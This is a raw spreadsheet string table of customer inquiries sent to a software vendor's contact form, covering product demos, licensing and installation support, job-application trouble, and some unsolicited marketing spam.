    <t xml:space="preserve">Respected Sir/Ma'am,_x000D_
_x000D_
We take this privilege to invite your organization to participate in 5th International Police Expo 2019 &amp; 4th India Homeland Security Expo 2019, 1st Drone International Expo – India during 19 - 20 July 2019 at Hall No. 8, 9 &amp; 10, Pragati Maidan, New Delhi, India. It is  India’s one and only exhibition on Army, Police &amp; other forces covering all segments like Defense, Homeland Security, Forensic, Law Enforcement, Armored &amp; Special Purpose Vehicles, Surveillance, Protection,  Communication, Fire, Disaster and Rescue Management, Force Wellness and Fitness, Training, Investigation Technology, Traffic &amp; Logistics, Modern equipment, technologies and inputs which are required by police, military , and allied forces for safety and protection of society and all other necessities in day to day and special operations._x000D_
_x000D_
The last edition was well attended by all the major officials from Ministry of Home Affairs, Ministry of Communication &amp; IT and Ministry of Defence India. More than 4000 delegates from Army, Navy, Air Force, Police,  Central Armed Police forces, Security organizations &amp; Industry stakeholders attended this two event and lauded it. Since its only exhibition for the Police, Central Armed Forces &amp; Homeland Security, respective stakeholders attended in a larger number with forces representatives and also because of internal and external threats to the nation._x000D_
_x000D_
Should you need any further clarification/information please do let us know._x000D_
_x000D_
Thanks with best regards,_x000D_
--_x000D_
Ashish Gupta_x000D_
Sr. Project Manager_x000D_
Nexgen Exhibitions Pvt. Ltd. (CIN:U93092DL2006PTC152355)_x000D_
1206, Pragati Tower, 26 Rajendra Place_x000D_
New Delhi-110008. INDIA_x000D_
Tel: 91-11-41536990_x000D_
Fax: 91-11-45636990_x000D_
Mob: 91-7533018555_x000D_
Email: ashish@nexgenexhibitions.com, info@internationalpoliceexpo.com_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
is it possible to get a demo license for the Gupta Report Builder? I downloaded the version 6.2 and the installer is asking me for a Product Media Code._x000D_
_x000D_
Thanks in advance_x000D_
Fatih Guer</t>
  </si>
  <si>
    <t>Bonjour, je souhaiterai avoir des renseignements sur Magellan, notamment sur les prérequis technologiques qu'il faudrait pour pouvoir l'installer et l'utiliser sur mon ordinateur. Ou pourrais-je trouver ces renseignements ?_x000D_
_x000D_
Cordialement, Constance Allain</t>
  </si>
  <si>
    <t>I would like to apply for the Senior Director, HR Business Partner and cant log in the job board.</t>
  </si>
  <si>
    <t>Hello team_x000D_
My name is Roman, I represent  RETN Company._x000D_
We are leading international network service provider and our goal is simple: to improve connectivity between our clients and the largest telecommunications nodes worldwide. More than 600 international and local carriers and 1500 corporate customers use various RETN network telecommunications services to transmit their data with superior performance from multiple locations worldwide. RETN and me personally will be glad to see you in the list of our partners, however, I understand that this requires a detailed discussion with the relevant specialists. _x000D_
Can you send this letter to the colleagues responsible for the network component of OpenText, please? I will be glad to discuss possible points of contact in more detail. By the way your office bilding in St. Petersburg is already connected to our metro-network._x000D_
Tuned to a productive dialogue and looking forward to hearing from you,_x000D_
thanks in advance!</t>
  </si>
  <si>
    <t xml:space="preserve">We are a CDMO providing products and services to the pharmaceutical industry and are evaluating possible document management solutions._x000D_
We would like to get a demo of your document management solution. (how does it work, what are the possibilities, …)_x000D_
Key questions we would also like to get answers on are:_x000D_
  * Possibilities on collaboration, reviewing content, signing, …_x000D_
  * CFR21 part 11 compliance_x000D_
  * possibilities of integration with 0365 including SharePoint_x000D_
  * Cloud versus on premise_x000D_
  * interfacing with LMS systems (eg success factors of SAP)_x000D_
  * General implementation time and cost, licencing policy and cost (roughly 800 read users, of them 300 create &amp; approve users)_x000D_
_x000D_
Best regards,_x000D_
Stefaan Van Fleteren_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam_x000D_
I will install open text 16.2 for customer Anex Tour. How can find installation guides, installation file and which I use user for enter the opentext sites?_x000D_
I have S0019770446 and S0017342987 susers._x000D_
It's very emergency. We're waiting your support._x000D_
Thank you _x000D_
Burcu</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I work for global reseller SoftwareONE._x000D_
_x000D_
One of our customer ‘SOLVIA SERVICIOS INMOBILIARIOS SL’ based in Spain has reached out to us to procure the below._x000D_
_x000D_
Opentext "50 USERS NOMINATED FOR FOLLOWS:_x000D_
_x000D_
CONTENT SUITE Content Suite Platform. Plataforma de Gestión Documental de_x000D_
_x000D_
Object Importer. S_x000D_
_x000D_
Please provide pricing and confirm if reseller discount is available._x000D_
_x000D_
Bill to – SoftwareONE ES_x000D_
_x000D_
Deployment – ES_x000D_
_x000D_
_x000D_
Regards,_x000D_
Ankit Agarwal_x000D_
</t>
  </si>
  <si>
    <t>There is an interview on March 2 for freshers,may I know on which domain the interview is going to conduct</t>
  </si>
  <si>
    <t>UG</t>
  </si>
  <si>
    <t>We are inquiring about your contributions program; since we are interested to apply. Please advice us of the steps to take._x000D_
_x000D_
Thank you _x000D_
George Obua_x000D_
Director,_x000D_
Kole Intellectual Forum</t>
  </si>
  <si>
    <t>Hi,_x000D_
One of my business partners has been upgraded to a new computer, however when we have gone to reinstall Brava! Desktop but it is giving a license error indicating that the license file is invalid._x000D_
_x000D_
Are you able to assist us with getting this instance of Brava! installed correctly?_x000D_
_x000D_
Regards,_x000D_
ben</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I am please to know whether DF120 and DF210 are mandated in order to get EnCE accreditation. I have 4 years of hands on expirence in Computer Forensic Examination. Please let me know if I attend only DF210 course , would I allowed to take the exam and appear for practical test? _x000D_
_x000D_
Best Regards_x000D_
Chetan  _x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am a Canadian Citizen and was wondering if your company policy is open to sponsoring Canadian individuals on a h1b or TN Visa. I came across some of your career oppurtunities in Alpharetta Georgia and if you are open to a sponsorship I would love to send you my Resume for some of the Information Technology positions. _x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Andrei Szilagyi</t>
  </si>
  <si>
    <t>We want to enhance our application to send individual and or mass texts as well as receive and process them</t>
  </si>
  <si>
    <t xml:space="preserve">Jak ponownie zainstalować zakupiony w czerwcu 2018 r. Wasz program - Brava Deskop CXL? Powód - n i e  d z i a ł a prawidłowo !!!!!  </t>
  </si>
  <si>
    <t>NEED A SAP VIM OPEN TEXT SERVER INSTALLATION</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
we would like to request for quote for Opentext software (EDocs) to archiving system._x000D_
_x000D_
regards,_x000D_
</t>
  </si>
  <si>
    <t>We are a Company based in Pakistan, looking for a Workflow automation tool to automate our manual processes.</t>
  </si>
  <si>
    <t>I am researching Forms Solution.  Specifically, I am looking for a solution that provides the following functionality: Form Library, Editing of Letters, forms generation, OCR image on a form/letter (used for tracking when the forms returned).  Please advise</t>
  </si>
  <si>
    <t>Hello poke</t>
  </si>
  <si>
    <t>would like to know how well the redaction functionality will be integrated with Alfresco ECM?</t>
  </si>
  <si>
    <t>How can I download Encase Imager to use in an introductory computer forensics class?</t>
  </si>
  <si>
    <t>Wanted to inquire if you have any "Control Tower Platform (Cloud Based) products with intelligent agent/interactive dashboard? Please let us know._x000D_
_x000D_
Regards,_x000D_
Jagannathan</t>
  </si>
  <si>
    <t>I'm not sure if we have a support contract with yourselves as I a did not procure the product._x000D_
However I have a USB with "CODEMETER" on it yet there is now software? I can't download the software from anywhere so how can I get it?_x000D_
The Royal Navy Cyber Protection Team procured this along with a lot of other software licenses just before Christmass but we have been unable to use it as we cannot download the product. When I ordered it I assumed that it was on the USB but its not, please can someone shed some light on this as it looks like we have just wasted £6.5K.</t>
  </si>
  <si>
    <t>Please let you send me sentiment Analysis tools for social media sites</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We would like to find a solution to manage company inquiry email that using database manage instead of emails storage in exchange. Since we have an existing solution that using c# to develop, the solution is to read the email content and then save it into SQL server. Do your DMS has API to let us easy to search and read mail item that saved into your DMS, thanks?</t>
  </si>
  <si>
    <t>Hey there!_x000D_
I am interested in writing a sponsored blog post for your website</t>
  </si>
  <si>
    <t>I recently joined OT through the Liaison acquisition.  I am the Product Manager for Contivo in Business Networks.  I was reviewing information for how to automatically classify documents as part of onboarding customers and ran across an OpenText link.  Who in your product management or engineering organization should I speak with?</t>
  </si>
  <si>
    <t xml:space="preserve">Many years ago, I tested a product called Hummingbird while working at UPS, around 1995. This was probably around the time of Windows 98. _x000D_
_x000D_
IIRC, the program installed into the menus of all application programs, intercepting the Save, SaveAs, and Open functions. _x000D_
_x000D_
When the user invoked the Save function, Hummingbird displayed a data panel in which the user would enter a variety of document descriptors, which were stored in a proprietary database as search tags. _x000D_
_x000D_
When the Open function was invoked, the user could select various values for descriptors, and Hummingbird would retrieve the list of document files that matched the choices._x000D_
_x000D_
My question: Have I described any product that you offer, and if so, which? _x000D_
_x000D_
Thanks for any help you can provide!_x000D_
-John_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am writing concerning potential archival data you may have from a website previously hosted using "Net-it Central." I was redirected here when I tried to go to Net-it Central's business - Informative Graphics. I am a policy researcher, trying to get a version of the policy regarding Assisted Living or Long-term Care in North Carolina from 2002 or 2003. I found the policy site in the Wayback Machine  (internet archives), but it looks like the web crawler just collected a copy of the Java error._x000D_
Is there any chance that you might have a copy of the site in your archives?_x000D_
Here is the link I'm hoping for (with forward slashes replaced with !s because URL's aren't allowed in your form):_x000D_
https:!!web.archive.org!web!20020818012420!http:!!ncrules.state.nc.us!ncadministrativ_!title10healthan_!chapter42indivi_!subchaptercrule!content.htm_x000D_
_x000D_
If you have any leads, I would appreciate it!_x000D_
Thanks,_x000D_
Lindsey</t>
  </si>
  <si>
    <t>TT</t>
  </si>
  <si>
    <t xml:space="preserve">The option to login using Google to send a resume in an application doesn't works._x000D_
I was not able to add my resume in the application for Infrastructure Engineering in São Paulo, Brazil._x000D_
</t>
  </si>
  <si>
    <t>I'm  trying to get credentials to use fax2fax system.  I was advised to log onto system using my cwt email address and forgot password.  **this request is urgent have been waiting since MondaY 2/18.** thank you, Pam</t>
  </si>
  <si>
    <t>Interested in getting info on Brava Enterprize viewer for IBM products</t>
  </si>
  <si>
    <t>AX</t>
  </si>
  <si>
    <t>I need information about document management solution that you have to small to medium size business in a single and multifamily real estate industry.</t>
  </si>
  <si>
    <t>Need to have Durham NC representative contact me for next steps...</t>
  </si>
  <si>
    <t>Looking for a short demo of the software</t>
  </si>
  <si>
    <t>Attempting to use the right fax Webserver (Restful API) to send a fax -- How do i update fields on the coversheet when executing a POST to the SendJobs endpoint?  I know the embedded code on the coversheet template, but i dont know how to compose the body of the POST to insure all fields on the covershet are populated correctly.</t>
  </si>
  <si>
    <t xml:space="preserve">Sales,_x000D_
                I have taken the Encase course at FLTC in Georgia and use it with my old Police Department. I am now working for a cybersecurity company and I would like recommend Encase. We are a MSSP, so we would sell Encase as part of our incident response and security stack. Can I get a pricing sheet and any relevant information._x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Please help reset the password for _x000D_
cts.faxadmin._x000D_
_x000D_
Regards,_x000D_
Ana_x000D_
_x000D_
Global Service Desk_x000D_
Information Management_x000D_
 _x000D_
US: 877-320-8267_x000D_
Brazil: 08000204228 • Colombia: 018005185228 • Hong Kong: 800931542 • Ireland: 1800903576 _x000D_
Japan: 006633813888 • Netherland: 08000249874 • Turkey: 00800142033891 • UK: 8000209667 _x000D_
</t>
  </si>
  <si>
    <t>I'd like to know how long a query on this OT contact page will take to reach me.  Please contact me at my OT address._x000D_
_x000D_
Regards,_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t>License renewal and software updates.</t>
  </si>
  <si>
    <t>Solicitação de proposta de compra ou outras modalidades para a aplicação, GED ou ECM_x000D_
_x000D_
Obrigado,</t>
  </si>
  <si>
    <t>I'm trying to pay my renewal invoice.</t>
  </si>
  <si>
    <t xml:space="preserve">Plug and Play is an accelerator based in the Silicon Valley. My team works with hundreds of startups daily to ensure that they have their IT needs met, and part of that is bringing great products/ solutions to them for them to optimize their business processes. We'd love to talk to someone at Opentext about a potential partnership opportunity to bring your products and solutions to all our startups. Thanks! </t>
  </si>
  <si>
    <t>Possuo versão antiga 10. Gostaria de comprar uma nova versão. Quais os valores praticados ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to submit a Request for Proposal for a new Digital Asset Management system. What would be the best way to go about that?_x000D_
_x000D_
Thank you,_x000D_
Sarah Sarka_x000D_
Adler Planetarium_x000D_
Chicago, IL</t>
  </si>
  <si>
    <t>Looking for information RightFax cloud with integration into Office 365.</t>
  </si>
  <si>
    <t xml:space="preserve">Buenos días, quisiera saber si me podrían proporcionar información sobre cual es el costo de FirstClass para una escuela </t>
  </si>
  <si>
    <t>Can you let me know what I am paying for with you guys? My reference number is 020705 and the amount is $21.54 a month- thanks!</t>
  </si>
  <si>
    <t>I'm interested in SMS messaging for our banking services.  We currently have Click Send but their info security is not up to our requirements.</t>
  </si>
  <si>
    <t>At one time, our product dept worked with someone there on features we can set up on faxes. My Provisioning dept was never given details on how we add these features and need to confirm how some of this gets added. Could someone please contact me on how to add things such as Hippa and PCI Compliance</t>
  </si>
  <si>
    <t>is there any training available for AppWorks?</t>
  </si>
  <si>
    <t>For one of our customers we are looking to automate the processing of a simple form. Today, around 20 000 of these forms are processed manually every year. Could you please provide me an offer for TeleForm?</t>
  </si>
  <si>
    <t xml:space="preserve">Opentext Core will not load. I have been attempting to access files that were shared to me on opentext core. However, it has been loading for several hours and has never finished. Tab status says "waiting on Opentext core..." _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'm trying to get a quote on Encase product support but our usual contact, Alison Ford, is not responding. Please advise.</t>
  </si>
  <si>
    <t>Need to speak with someone about upgrading our righfax.</t>
  </si>
  <si>
    <t xml:space="preserve">I just called for support and the technical support agent transfered me to a completely different company. I called in at around 9:09 am (MST). Anyway I need to migrate the software from one computer to another. I need to figure out how to find the license number and how to download the product. I currently have connectivity secure shell 2008 and exceed 2008 installed. </t>
  </si>
  <si>
    <t>We would like to purchase additional channel capacity with our Brooktrout SR140 boards. Current RightFax  SUID 99961-12100</t>
  </si>
  <si>
    <t xml:space="preserve">I represent the Office of the Harris County Purchasing Agent in Houston, Texas and would like to invite your agency to participate in a Request for Information (RFI) for eDiscovery services. If your agency would like to receive the RFI for this project, please provide contact information including an email address no later than close of business, Friday, March 1, 2019. The RFI will be released the week of March 4th._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Yesterday, I was informed our current reseller, Naviant, will no longer be supporting the AX product starting in 2020.  How do I go about evaluating/selecting another reseller for support?_x000D_
_x000D_
Thanks,_x000D_
Darren</t>
  </si>
  <si>
    <t>Gostaríamos de conhecer as soluções Opentext para gestão da qualidade, especialmente gestão de documentos, mudanças e auditorias.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for an introductory quote on OpenText Media Management. We are interested in the hybrid approach. </t>
  </si>
  <si>
    <t>SJ</t>
  </si>
  <si>
    <t>NS</t>
  </si>
  <si>
    <t>BS</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
This is Angela. I found your Company in from Google search, I'm a blogger outreach service provider and I provide SEO, Blog posting, Digital Marketing and writing services. I have lots of high-quality blogs. I have sites on (Finance, Law, Business, Real-estate, Mortgage, Tech, SEO web, Health, Shopping, Fashion, Education, Travel Pet, Home, and more niches)_x000D_
_x000D_
Here are some more details about this service:-_x000D_
_x000D_
* Link type: Dofollow_x000D_
* Written by– a qualified editor_x000D_
* Includes images_x000D_
* Placed on a site that’s got either a Page Rank of 2+ or a Domain Authority of 25+_x000D_
* Posted to any niche you like_x000D_
* You can supply the topic if you want – otherwise I’m more than happy to choose._x000D_
* The turnaround time is 15 days (usually less)._x000D_
*100% satisfaction guaranteed or you get 100% full refund if I can't get your article published._x000D_
* Friendly customer service_x000D_
_x000D_
If you have any interest in my service, Feel Free To Contact with Me Anytime._x000D_
_x000D_
Regards!_x000D_
Angela</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
I work for Experian and one of our user needs Open text exceed 15 software could you please share me the process to get the requested software._x000D_
</t>
  </si>
  <si>
    <t>We purchased a one year support contract when we upgraded AX to 16.3.  How do we open a support ticket?  One of our users is having an issue logging into Global Administration.  She sometimes receives a message that she is not properly synced.</t>
  </si>
  <si>
    <t>VU</t>
  </si>
  <si>
    <t>HOLA, QUIERO SABER LOS COSTOS PARA UNA PLATAFORMA</t>
  </si>
  <si>
    <t>StreamServe Management Gateway 5.6.1_x000D_
_x000D_
Hello, _x000D_
I have the service "StreamService Management Gateway 5.6.1" that regularly stop. Do you have any idea for what reason that happen ?_x000D_
_x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>MF</t>
  </si>
  <si>
    <t xml:space="preserve">DEar all,_x000D_
I am trying to apply to the HRBP job offer in France. The system does not allow me to download my resume. Thus it is not possible for me to finalize my application. I am motivated and I would be more than happy to introduce myself as an HRBP with a huge experience in highly demanding environments. I have a dual experience in sales and in HR. This gives me the advantage to be a real support for the business and also to be in a good position to challenge managers and Comex members. I have recently done a one year mission for an investment fund dealing with a high and rapid growth. I brought new HR practices and rituals with the objective to increase people engagement and to support managers to acquire a more leadership behavior. I am looking forward to meeting. Best regards, Barbara Atlas </t>
  </si>
  <si>
    <t>One of our employees (Danielle Ross) is registered for the Managing Documents in Content Server virtual classroom on Monday, Feb 25th but due to unforeseen circumstances, she will not be able to attend. Is there any way to move the registration to a later date?</t>
  </si>
  <si>
    <t>To issues:_x000D_
1) We have an ongoing ticket 4073158 that we don't get any response on_x000D_
I keep sending mails to the UK-adress, I can see that the mail is beeing recieved but I do not get any answers. This ticket has been open for a long time and it's only last week that there has been no respons from you._x000D_
I hope to get some answers on that one so that we can get EnCase v8 up and running_x000D_
2) I am taking over responsibillity for EnCase-licensing from mr. Morten Mjanger here at Kripos (NCIS)._x000D_
I need all information I can get from you regarding number of licenses, our customer number, license agreement number, date of purchase, any expiring dates etc._x000D_
We are running EnCase Forensic v6, v7 and now trying to get v8 up and running._x000D_
But how many users can use EnCase at the same time, using the EnCase LM, NAS, solution? I need information and the one responsible for this has left without any documentation._x000D_
I hope you can provide me with this._x000D_
_x000D_
Best regards_x000D_
Øyvind Normann</t>
  </si>
  <si>
    <t>General Inquiries,General Inquiries</t>
  </si>
  <si>
    <t>I would like to receive information about Documentum</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are looking for a solution that could convert a range of different document types, MS Excel, Word, MicroStation, AutoCAD into .pdf... We would need to convert in a batch process, usin command lines, in a queue system._x000D_
_x000D_
OpenText Brava viewer seems to "do the job". Could you please confirm that this product can be used in an automated environement (multi-users / queuing system)?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Xavier Hess_x000D_
Applications Analyst_x000D_
Applications Services_x000D_
ConocoPhillips Norway_x000D_
Office: +47 5202 9310</t>
  </si>
  <si>
    <t>We want similar license for 5.2 which will be valid for a year and be generic in nature so that it can be run on development and test Virtual machines without being tied to server name.</t>
  </si>
  <si>
    <t>FK</t>
  </si>
  <si>
    <t>CC</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir benötigen eine Verlängerung eines abgelaufenen Wartungsvertrages._x000D_
Wir stellen in Citrix Terminalserver momentan von Office 2013 auf Office 2016 um. Die vorhandene Software EmailManagementAddin_10.1.0.msi - für die Anzeige der archivierten Mails - ist mit der Office Version 2016 nicht kompatibel. _x000D_
_x000D_
Bitte umgehend um Kontaktaufnahme. _x000D_
_x000D_
Danke_x000D_
Mit freundlichen Grüßen_x000D_
Thomas Neuberger</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText,_x000D_
_x000D_
By way of introduction, I’m JingJing from IT department of Great Eastern Life, Singapore._x000D_
_x000D_
In a latest M&amp;A event, GE has acquired PT QBE General Insurance Indonesia. As part of due diligence with PT QBE, we understood that PT QBE is currently using OpenText Exstream application for document generation purpose. At current phase, we are working on the IT integration plan for PT QBE and explore the feasible option to support PT QBE business process._x000D_
_x000D_
In order for us to understand the details of OpenText Exstream application, could you link us with account manager / support team who currently support PT QBE? We would like to understand more on the details on the contract, license, supporting roles from OpenText in the current support model for OpenText Exstream application for PT QBE and explore the opportunity to move forward for the arrangement._x000D_
_x000D_
Thank you and we look forward to hear from you soon._x000D_
</t>
  </si>
  <si>
    <t>Wir suchen ergänzend und aufbauend auf unser ERP SAP Business ByDesign ein Datenmanagementsystem einschl. E-Rechnungsverarbeitung. Bieten Sie dazu Lösungen an?</t>
  </si>
  <si>
    <t>We are a hardware company in Hangzhou,China,and we are going to work with Target,now we need the EDI service,and please let us know your products and prices,thank you.</t>
  </si>
  <si>
    <t>Реклама Ваших товаров и услуг ! _x000D_
 _x000D_
РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ В 1 200 000 ФОРМ РОССИИ И СНГ - 3000 РУБЛЕЙ _x000D_
 _x000D_
РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ ЛЮБОЙ СТРАНЫ - 3000 РУБЛЕЙ ЗА 2 МЛН СООБЩЕНИЙ _x000D_
 _x000D_
СКИДКА 50% на рассылку до 25 февраля! _x000D_
 _x000D_
Это отправка по формам с сайтов в разделе контакты, которые заполняются нашим роботом. _x000D_
Далее письмо с вашим предложением приходит на контактный E-mail организации. _x000D_
При отправку через форму  каждый сайт отправляет сообщение «сам себе» и поэтому все письма приходят во входящие! _x000D_
 _x000D_
Не отвечайте на это сообщение со своей электронной почты, так как оно создано автоматически! _x000D_
 _x000D_
Контакты для связи: _x000D_
sviazs@bk.ru _x000D_
Telegram: @form2018 _x000D_
Skype: 2018form</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I'm Kristi (Marketing consultant). I stumbled upon your website and realized that despite having a good design, your website is not ranking on any of the search engines with most of the business-oriented keywords. I was wondering if you would be interested in optimization and social media promotion of your website._x000D_
_x000D_
All of our practices are White Hat Techniques and we strictly follow Google Webmasters Guidelines to promote our clients’ websites online. I will suggest some traffic generating keywords as per the principles of Search Engine Optimization._x000D_
_x000D_
If you are interested, let me know your phone no or Skype ID. so we can have a quick call then I can send you our past work details, company information, and an affordable quotation. Please email us back to get detail._x000D_
_x000D_
Please email us back to get the details._x000D_
_x000D_
Warm Regards,_x000D_
Kristi Jencks_x000D_
_x000D_
In case you are NOT INTERESTED, reply with "UNSUBSCRIBE" and you will be removed from our database within 2 business days, don't worry!_x000D_
</t>
  </si>
  <si>
    <t>Hi OpenText support team,_x000D_
_x000D_
We have an EnCase Dongle. _x000D_
Nice if you could provide the procedure for downloading the most updated software._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>hi,_x000D_
we have a team who is interested in taking a training on Open text. Please let me know how can we connect regarding this requirement._x000D_
You may reach out to me on email and my cellphone.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,_x000D_
_x000D_
We have implimented OCR for Accounts Payable team in India. We are phase of automating Order management process. Can we get a point of contact for Juniper Networks to take it fearther. _x000D_
_x000D_
Thank in advance._x000D_
_x000D_
Regards,_x000D_
Bipin_x000D_
+91 9844608356_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I had used your services as a State Farm agent.  I am no longer a State Farm agent.  I called and received confirmation in December that my fax service was cancelled.  I received a charge on my credit card 2/21/2019.  I need to make sure this is cancelled and my card taken off.</t>
  </si>
  <si>
    <t>Please refer to our ticket OTCS Ticket 4073129 : CS16.2: Search and Indexing. The search is non functional. ECM client on PC crash at random. We have spent a quarter million for the ECM solution and now were are unable to use it. We have reported that excel macros don't work for documents stored in ECM. We are unable to link Excel documents stored in ECM. We were promised that we can do away with network share if we move to ECM. These promises have not be honoured. kindly resolve.</t>
  </si>
  <si>
    <t>DJ</t>
  </si>
  <si>
    <t>I have a customer that is using my software program that I created using an older version of TD 1.5.1. They have been using my software to generate emails to Microsoft Outlook, however, they have had issues lately with the software not communicating properly with Outlook. The customer now wants to submit emails directly using SMTP to the Office 365 server. To support this it would also need to support connecting using TLS._x000D_
Can I update TD 1.5.1 to achieve this, or do I need to update to a new version, or is there an add-on that I need to apply or do I need to do a program change._x000D_
This is an URGENT matter as the client is becoming a bit frustrated and I do not want to lose them. Any advice you can provide will be greatly beneficial._x000D_
At this moment, I am not a paid subscriber/member of Gupta._x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Con Panas</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for enterprise content management solution. I would like to understand your solution to see if it can meet our needs. </t>
  </si>
  <si>
    <t xml:space="preserve">I'm doing research on Exceed TurboX (ETX) and its ability to leverage GPUs.    Can someone inform me where the GPUs are typically used?    Do they go on the Application Hosts Servers, ETX servers, and/or the client machines?    Are there reference architectures that depict the optimal use for GPUs, particularly in a virtualized vsphere environment leveraging Nvidia GRID software?  _x000D_
_x000D_
~Angelo </t>
  </si>
  <si>
    <t>AN</t>
  </si>
  <si>
    <t>Requesting help to restore one of the EnCase Safe. Whenever i try to login, it prompting wrong credentials, while i am using the given information.</t>
  </si>
  <si>
    <t>Please I need to download the latest version of EnCase Forensic enabled for the license dongle G2002022947, when I try to connect to OpenText My Support the server is not available._x000D_
_x000D_
I appreciate the collaboration._x000D_
_x000D_
Por favor necesito descargar la ultima versión de EnCase Forensic habilitado para la licencia G2002022947, cuando intento conectar a OpenText My Support  el servidor no se encuentra disponible._x000D_
_x000D_
agradezco la colaboración.</t>
  </si>
  <si>
    <t>We are moving to upgraded primary Production and secondary High-Availability servers. We use Trusted Link (fka GSX) and AS2 Integrator (fka Liaison) on IBM i servers.  Please advise.</t>
  </si>
  <si>
    <t>I am hoping to use the program in a trial phase to see if it will work for our business.  We are already tracking data, but need a more efficient and reliable way of inputting the data for further analysis.  I'd love to talk to someone about the capabilities of OpenText ODR software.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a proper replacement/upgrade of our current alchemy solution. We currently have 2 users that use alchemy and like it but it was not set up properly and is an old version. We also will need ongoing support after implementation. </t>
  </si>
  <si>
    <t xml:space="preserve">We have a client that is currently leveraging both eDocs and SharePoint Online, and we would like to understand more about the interoperability between the two platforms, so that we can help our use both to best effect. I'd like to get information on the SharePoint solution, and possibly a demo of the functionality. </t>
  </si>
  <si>
    <t>Fiserv has stated that our institution should update our systems to use _x000D_
BI Query Update 1051118 Can you please provide a link to download this file?_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I am not able to upload my CV using Google drive. Since your portal is no verified by Google it says. Help me.. I wish to apply for a csm opportunity in your company</t>
  </si>
  <si>
    <t>I'd like some information on InfoArchive to see if it's a fit for an on-going project. Please email first, do not call.</t>
  </si>
  <si>
    <t>Good day Team,_x000D_
_x000D_
I’m currently working on a 2 day business meet titled “Plant Reliability &amp; Maintenance Excellence Summit” which is being held on 4th – 5th September 2019 | Monterrey, Mexico and would like to see if OPENTEXT would be interested in presenting your brand, products &amp; services to over 70+ senior industry professionals representing leading energy companies, oil &amp; gas, automobile, industrial attending this event from the LatAm region._x000D_
_x000D_
 Do let me know who I can take this up with._x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mukesh Kumar_x000D_
Training Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote to renew maintenance for Pixtools for .NET.  _x000D_
Previously quoted by - Current contact information is no longer valid._x000D_
OpenText UK Limited_x000D_
420 Thames Valley Park Drive_x000D_
Thames Valley Park_x000D_
READING_x000D_
Berkshire_x000D_
RG6 1PT_x000D_
UNITED KINGDOM </t>
  </si>
  <si>
    <t>I need someone from your tech support group to contact me(preferably by email to start) regarding one of  our users who's having trouble with Brava Desktop not being able to open TIFF files that both the Windows (7 and 10) builtin viewer and Irfanview can open.</t>
  </si>
  <si>
    <t>I have 2 users that do not receive a notification in their outlook when a fax has arrived.  I need assistance troubleshooting this issue?_x000D_
_x000D_
Also, is there any documentation that you can provide that gives the step by step on how to create a new RightFax user?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we have just been notified by our solutions provider "Connectis Group" that our Teleform and Liquid Office support and licensing costs are going up by 25%-30% .  Fortunately they are honouring last years costs for this year. I was told that the increases are coming from OpenText. I just wanted to voice my concern over such a big increase next year. It  will translate to over 8k more per year for us moving forward. I would expect at least some prior warning. _x000D_
_x000D_
Regards,_x000D_
Robert Caruso_x000D_
</t>
  </si>
  <si>
    <t>GG</t>
  </si>
  <si>
    <t>GW</t>
  </si>
  <si>
    <t>We are looking to increase efficiency in our business processes, specifically data entry, by leveraging technology like ocr. How can you help?</t>
  </si>
  <si>
    <t>Business name change from AS Barboro (BARDETT LLC) to Ajax Distributing Company Of Memphis, LLC effective March 8th 2019. We want to utilize the same vendor number</t>
  </si>
  <si>
    <t>Trying to use the IRM Client for Adobe, most of our systems that need this are working fine. We hired a new user and setup new system. Installed the software and getting 'There was an error opening this document. Bad parameter.'_x000D_
There is a difference between versions of Adobe and O/S between those users._x000D_
New user is running Adobe DC 2019.010.20098 and Windows 10 Enterprise Ver. 1809, build 17763.316._x000D_
Also tried on my system, same OS ver. and build, adobe version DC 2019.010.20091 and am having the same issue. Other users running on windows 7 ent. are able to open the ones I am having issues with.</t>
  </si>
  <si>
    <t>AW</t>
  </si>
  <si>
    <t>I am trying to access an employer survey on the HRET (dotorg) website via selecting "Patient &amp; Family Workforce Engagement" and selecting "Employer Health Benefits Survey"; clicking this directs me to an OpenText login page, but my login won't work</t>
  </si>
  <si>
    <t>Our entire account team left Opentext and I have a question about licensing.  Is there a new account manager for our company?  Keep in mind we are American Express Global Business Travel.  NOT American Express.  Thank you in advance.</t>
  </si>
  <si>
    <t>Digital Asset Management</t>
  </si>
  <si>
    <t>I need to speak with a sales rep about adding some features to our existing Media Management software</t>
  </si>
  <si>
    <t>I would like the email address for customer service so I can send in a purchase order._x000D_
_x000D_
thank you</t>
  </si>
